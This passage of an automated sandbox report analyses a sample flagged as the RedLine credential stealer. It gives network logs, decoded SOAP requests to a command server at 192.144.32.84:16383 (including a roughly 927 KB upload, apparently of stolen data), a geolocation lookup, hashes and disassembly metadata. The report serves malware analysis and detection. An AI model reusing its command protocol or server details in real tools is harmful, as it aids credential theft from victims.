                                                                                                                Jan 22, 2025 04:12:11.560195923 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560221910 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560221910 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:11.560235977 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560249090 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560276031 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560288906 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560302019 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560314894 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560340881 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560353994 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560365915 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560379028 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560412884 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.560425997 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:11.603873014 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:12.222477913 CET1638349734192.144.32.84192.168.2.4
                                                                                                                Jan 22, 2025 04:12:12.267087936 CET4973316383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:12.267154932 CET4973416383192.168.2.4192.144.32.84
                                                                                                                Jan 22, 2025 04:12:43.731578112 CET5479553192.168.2.4162.159.36.2
                                                                                                                Jan 22, 2025 04:12:43.736917019 CET5354795162.159.36.2192.168.2.4
                                                                                                                Jan 22, 2025 04:12:43.737340927 CET5479553192.168.2.4162.159.36.2
                                                                                                                Jan 22, 2025 04:12:43.742507935 CET5354795162.159.36.2192.168.2.4
                                                                                                                Jan 22, 2025 04:12:44.215291023 CET5479553192.168.2.4162.159.36.2
                                                                                                                Jan 22, 2025 04:12:44.220443964 CET5354795162.159.36.2192.168.2.4
                                                                                                                Jan 22, 2025 04:12:44.220516920 CET5479553192.168.2.4162.159.36.2
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 22, 2025 04:12:07.149708986 CET4938553192.168.2.41.1.1.1
                                                                                                                Jan 22, 2025 04:12:07.157325983 CET53493851.1.1.1192.168.2.4
                                                                                                                Jan 22, 2025 04:12:43.730464935 CET5359310162.159.36.2192.168.2.4
                                                                                                                Jan 22, 2025 04:12:44.236062050 CET53582131.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 22, 2025 04:12:07.149708986 CET192.168.2.41.1.1.10x5a32Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 22, 2025 04:12:07.157325983 CET1.1.1.1192.168.2.40x5a32No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Jan 22, 2025 04:12:07.157325983 CET1.1.1.1192.168.2.40x5a32No error (0)api.ip.sb.cdn.cloudflare.net172.67.75.172A (IP address)IN (0x0001)false
                                                                                                                Jan 22, 2025 04:12:07.157325983 CET1.1.1.1192.168.2.40x5a32No error (0)api.ip.sb.cdn.cloudflare.net104.26.13.31A (IP address)IN (0x0001)false
                                                                                                                Jan 22, 2025 04:12:07.157325983 CET1.1.1.1192.168.2.40x5a32No error (0)api.ip.sb.cdn.cloudflare.net104.26.12.31A (IP address)IN (0x0001)false
                                                                                                                • api.ip.sb
                                                                                                                • 192.144.32.84:16383
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449731192.144.32.84163837296C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 22, 2025 04:12:01.187937021 CET240OUTPOST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                Host: 192.144.32.84:16383
                                                                                                                Content-Length: 137
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 22, 2025 04:12:01.751485109 CET359INHTTP/1.1 200 OK
                                                                                                                Content-Length: 212
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Wed, 22 Jan 2025 03:12:01 GMT
                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                Jan 22, 2025 04:12:06.901362896 CET223OUTPOST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                Host: 192.144.32.84:16383
                                                                                                                Content-Length: 144
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Jan 22, 2025 04:12:07.025682926 CET25INHTTP/1.1 100 Continue
                                                                                                                Jan 22, 2025 04:12:07.075903893 CET1236INHTTP/1.1 200 OK
                                                                                                                Content-Length: 10749
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Wed, 22 Jan 2025 03:12:07 GMT
                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>197.210.29.206</b:string><b:string>39.149.3.127</b:string><b:string>139.186.206.86</b:string><b:string>40.122.25.223</b:string><b:string>39.187.217.246</b:string><b:string>60.191.212.86</b:string><b:string>13.89.107.79</b:string><b:string>219.145.34.122</b:string><b:string>1.192.194.178</b:string><b:string>113.88.115.106</b:string><b:string>115.204.242.245</b:string><b:string>219.147.21.122</b:string><b:string>120.235.51.192</b:string><b:string>172.203.161.82</b:string><b:string>172.203.161.82</b:string><b:string>20.7.183.169</b:string><b:string>20.7.183.169</b:string><b:string>104.42.169.232 [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449733192.144.32.84163837296C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 22, 2025 04:12:09.938782930 CET221OUTPOST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                Host: 192.144.32.84:16383
                                                                                                                Content-Length: 927088
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Jan 22, 2025 04:12:11.159625053 CET294INHTTP/1.1 200 OK
                                                                                                                Content-Length: 147
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Wed, 22 Jan 2025 03:12:11 GMT
                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.449734192.144.32.84163837296C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 22, 2025 04:12:11.168447018 CET241OUTPOST / HTTP/1.1
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                Host: 192.144.32.84:16383
                                                                                                                Content-Length: 927080
                                                                                                                Expect: 100-continue
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 22, 2025 04:12:12.222477913 CET408INHTTP/1.1 200 OK
                                                                                                                Content-Length: 261
                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                Date: Wed, 22 Jan 2025 03:12:12 GMT
                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449732172.67.75.1724437296C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-22 03:12:07 UTC64OUTGET /geoip HTTP/1.1
                                                                                                                Host: api.ip.sb
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-22 03:12:08 UTC939INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 22 Jan 2025 03:12:08 GMT
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                vary: Accept-Encoding
                                                                                                                Cache-Control: no-cache
                                                                                                                access-control-allow-origin: *
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JShr7nDGfP%2BZLE8Eu6e8DXhwt%2FvCT6Z67F5SX9JuPf7OAGqsMTgFp14qNzkve7q1xpZ3h1gVnh4SPlMoM4h1zJEY9J4kd47MhwS5dLv3bvxxGfCPAEokyAVYOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 905c5c514db66a58-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2330&min_rtt=2328&rtt_var=877&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2806&recv_bytes=678&delivery_rate=1245733&cwnd=238&unsent_bytes=0&cid=4ab6a8f6c2d29b03&ts=465&x=0"
                                                                                                                2025-01-22 03:12:08 UTC351INData Raw: 31 35 38 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 36 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6f 66 66 73 65 74 22 3a 2d 31 38 30 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 61 74 69 74 75 64 65
                                                                                                                Data Ascii: 158{"organization":"CenturyLink","longitude":-74.0066,"city":"New York","timezone":"America\/New_York","isp":"CenturyLink","offset":-18000,"region":"New York","asn":3356,"asn_organization":"LEVEL3","country":"United States","ip":"8.46.123.189","latitude
                                                                                                                2025-01-22 03:12:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:22:11:58
                                                                                                                Start date:21/01/2025
                                                                                                                Path:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\VXB84UvyHp.exe"
                                                                                                                Imagebase:0xab0000
                                                                                                                File size:97'792 bytes
                                                                                                                MD5 hash:4698A45D6F8DA200C396E56AF7B8D34F
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:22:11:58
                                                                                                                Start date:21/01/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:11.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:30
                                                                                                                  Total number of Limit Nodes:1
                                                                                                                  execution_graph 37765 2d20871 37769 2d208d8 37765->37769 37774 2d208c8 37765->37774 37766 2d20889 37770 2d208fa 37769->37770 37779 2d20ce0 37770->37779 37783 2d20ce8 37770->37783 37773 2d2093e 37773->37766 37775 2d208d8 37774->37775 37777 2d20ce0 GetConsoleWindow 37775->37777 37778 2d20ce8 GetConsoleWindow 37775->37778 37776 2d2093e 37776->37766 37777->37776 37778->37776 37780 2d20ce8 GetConsoleWindow 37779->37780 37782 2d20d56 37780->37782 37782->37773 37784 2d20d26 GetConsoleWindow 37783->37784 37786 2d20d56 37784->37786 37786->37773 37747 66e6361 37748 66e62fc 37747->37748 37749 66e636a 37747->37749 37753 66e7400 37748->37753 37757 66e73f1 37748->37757 37750 66e631d 37754 66e7448 37753->37754 37755 66e7451 37754->37755 37761 66e7148 37754->37761 37755->37750 37758 66e738d 37757->37758 37758->37757 37759 66e7451 37758->37759 37760 66e7148 LoadLibraryW 37758->37760 37759->37750 37760->37759 37762 66e75f0 LoadLibraryW 37761->37762 37764 66e7665 37762->37764 37764->37755
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1824384991.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_66e0000_VXB84UvyHp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$$^q$$^q$$^q$c^q$c^q
                                                                                                                  • API String ID: 0-692146702
                                                                                                                  • Opcode ID: c2bd149d695c662a226b5b21c74789c3107dc004bed5588d05250dba55d687e7
                                                                                                                  • Instruction ID: 538512155d75f2a1ca852253d59966b2ea82c0434bb73b7b641042f0c192feac
                                                                                                                  • Opcode Fuzzy Hash: c2bd149d695c662a226b5b21c74789c3107dc004bed5588d05250dba55d687e7
                                                                                                                  • Instruction Fuzzy Hash: 84828470F811184FCBA9AB7D855026D66E3BFCCB40B2049A9D04ADF394EE25DC878BD5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 415 66edd00-66edd49 417 66edd4f-66edd7b call 66ed540 415->417 418 66ede17-66ede25 415->418 427 66edd9c-66edda0 417->427 428 66edd7d-66edd97 417->428 422 66ede27-66ede2b 418->422 423 66ede81-66ede85 418->423 429 66ede33-66ede3a 422->429 425 66ede87-66ede93 423->425 426 66ede95-66ede9c 423->426 425->426 435 66ede9f-66edec7 425->435 426->435 433 66edda2-66eddab 427->433 434 66eddc1 427->434 447 66ee1eb-66ee1f7 428->447 429->423 431 66ede3c-66ede5b 429->431 451 66ee1e8 431->451 438 66eddad-66eddb0 433->438 439 66eddb2-66eddb5 433->439 437 66eddc4-66eddc9 434->437 458 66ee0dd-66ee0e8 435->458 459 66edecd-66ededb 435->459 437->418 441 66eddcb-66eddcf 437->441 440 66eddbf 438->440 439->440 440->437 445 66ede08-66ede0e 441->445 446 66eddd1-66eddec 441->446 445->418 446->445 454 66eddee-66eddf4 446->454 451->447 456 66ee1fa-66ee20e 454->456 457 66eddfa-66ede03 454->457 468 66ee215-66ee278 456->468 457->447 463 66ee11d-66ee156 458->463 464 66ee0ea-66ee101 458->464 465 66ee385-66ee39c 459->465 466 66edee1-66edef4 459->466 475 66ee1ac-66ee1bf 463->475 476 66ee158-66ee16f 463->476 464->463 483 66ee103-66ee109 464->483 473 66edf1f-66edf2d 466->473 474 66edef6-66edf03 466->474 487 66ee27f-66ee2af 468->487 473->465 486 66edf33-66edf48 473->486 474->473 484 66edf05-66edf0b 474->484 479 66ee1c1 475->479 489 66ee178-66ee17a 476->489 479->451 483->487 488 66ee10f-66ee118 483->488 484->468 490 66edf11-66edf1a 484->490 496 66edf4a-66edf63 486->496 497 66edf68-66edfe0 486->497 506 66ee31b-66ee37e 487->506 507 66ee2b1-66ee314 487->507 488->447 492 66ee17c-66ee199 489->492 493 66ee19b-66ee1aa 489->493 490->447 492->479 493->475 493->476 509 66edfe6-66edfed 496->509 497->509 506->465 507->506 509->458 511 66edff3-66ee02c 509->511 520 66ee02e-66ee055 call 66ed540 511->520 521 66ee098-66ee0ab 511->521 534 66ee076-66ee096 520->534 535 66ee057-66ee074 520->535 525 66ee0ad 521->525 525->458 534->520 534->521 535->525
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1824384991.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_66e0000_VXB84UvyHp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4|cq$$^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-997030528
                                                                                                                  • Opcode ID: 886688cb6b86ad45fb3f229e2a157c3e5988ad8bbc93a5df690780d336c3f3a3
                                                                                                                  • Instruction ID: 8d6fdaae0932245ae98ab5be399224d088ea2adc308f86a2f16377b6a6de3ebd
                                                                                                                  • Opcode Fuzzy Hash: 886688cb6b86ad45fb3f229e2a157c3e5988ad8bbc93a5df690780d336c3f3a3
                                                                                                                  • Instruction Fuzzy Hash: FF022A34B002198FDB54DFA9C854AAEBBF6BF88200F148469E409EB365DF359D46CF91

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 543 66e3320-66e3361 545 66e336d-66e3371 543->545 546 66e3363-66e336b 543->546 547 66e3376-66e337b 545->547 546->547 548 66e337d-66e3382 547->548 549 66e3384-66e338d 547->549 550 66e3390-66e3392 548->550 549->550 551 66e36fe-66e3728 550->551 552 66e3398-66e33b1 call 66e3198 550->552 576 66e372f-66e376f 551->576 556 66e33ff-66e3406 552->556 557 66e33b3-66e33c3 552->557 558 66e340b-66e341b 556->558 559 66e3408 556->559 560 66e33c9-66e33e1 557->560 561 66e3696-66e36b3 557->561 563 66e341d-66e3429 558->563 564 66e342b-66e3448 558->564 559->558 565 66e36bc-66e36c5 560->565 566 66e33e7-66e33ee 560->566 561->565 568 66e344c-66e3458 563->568 564->568 569 66e36cd-66e36f7 565->569 566->569 570 66e33f4-66e33fe 566->570 571 66e345e 568->571 572 66e345a-66e345c 568->572 569->551 575 66e3461-66e3463 571->575 572->575 575->576 577 66e3469-66e347e 575->577 608 66e3776-66e37b6 576->608 579 66e348e-66e34ab 577->579 580 66e3480-66e348c 577->580 582 66e34af-66e34bb 579->582 580->582 584 66e34bd-66e34c2 582->584 585 66e34c4-66e34cd 582->585 587 66e34d0-66e34d2 584->587 585->587 589 66e355a-66e355e 587->589 590 66e34d8 587->590 592 66e3592-66e35aa call 66e3060 589->592 593 66e3560-66e357e 589->593 662 66e34da call 66e3818 590->662 663 66e34da call 66e3320 590->663 664 66e34da call 66e3311 590->664 612 66e35af-66e35d9 call 66e3198 592->612 593->592 605 66e3580-66e358d call 66e3198 593->605 594 66e34e0-66e3500 call 66e3198 600 66e3502-66e350e 594->600 601 66e3510-66e352d 594->601 606 66e3531-66e353d 600->606 601->606 605->557 610 66e353f-66e3544 606->610 611 66e3546-66e354f 606->611 635 66e37bd-66e37d6 608->635 614 66e3552-66e3554 610->614 611->614 620 66e35db-66e35e7 612->620 621 66e35e9-66e3606 612->621 614->589 614->608 622 66e360a-66e3616 620->622 621->622 624 66e361c 622->624 625 66e3618-66e361a 622->625 626 66e361f-66e3621 624->626 625->626 626->557 628 66e3627-66e3637 626->628 629 66e3639-66e3645 628->629 630 66e3647-66e3664 628->630 632 66e3668-66e3674 629->632 630->632 633 66e367d-66e3686 632->633 634 66e3676-66e367b 632->634 636 66e3689-66e368b 633->636 634->636 640 66e37de-66e3815 635->640 636->635 637 66e3691 636->637 637->552 644 66e3817-66e382f 640->644 645 66e3859-66e3868 644->645 646 66e3831-66e3841 644->646 647 66e3869-66e389f call 66e3198 646->647 648 66e3843-66e3858 646->648 652 66e38a7-66e38ae 647->652 653 66e38a1-66e38a6 647->653 654 66e38b3-66e38c0 652->654 655 66e38b0 652->655 657 66e38ce-66e38d9 654->657 658 66e38c2-66e38c4 call 66e3d70 654->658 655->654 659 66e38ca-66e38cd 658->659 662->594 663->594 664->594
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1824384991.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_66e0000_VXB84UvyHp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                  • API String ID: 0-1677660839
                                                                                                                  • Opcode ID: 31b1a1caa8ee0c2562d8dfb03a5e56a70603ab4ef6d373061db4d2b63544d829
                                                                                                                  • Instruction ID: 6bd795d791ab5f9f96dc9e5e3e8b336eaca9efe8c4a3b8149596910f256624b9
                                                                                                                  • Opcode Fuzzy Hash: 31b1a1caa8ee0c2562d8dfb03a5e56a70603ab4ef6d373061db4d2b63544d829
                                                                                                                  • Instruction Fuzzy Hash: B1028D31E1125ACFCB55CFB5C4502ADFBB2FF85300F24866AD456AB341EB35AA85CB90
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1824384991.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_66e0000_VXB84UvyHp.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Hbq
                                                                                                                  • API String ID: 0-1245868
                                                                                                                  • Opcode ID: d862a3cf01099302e78a2940d0a5cc32a0c12d7b8fb4c7f9a8eeaf555924fdbe
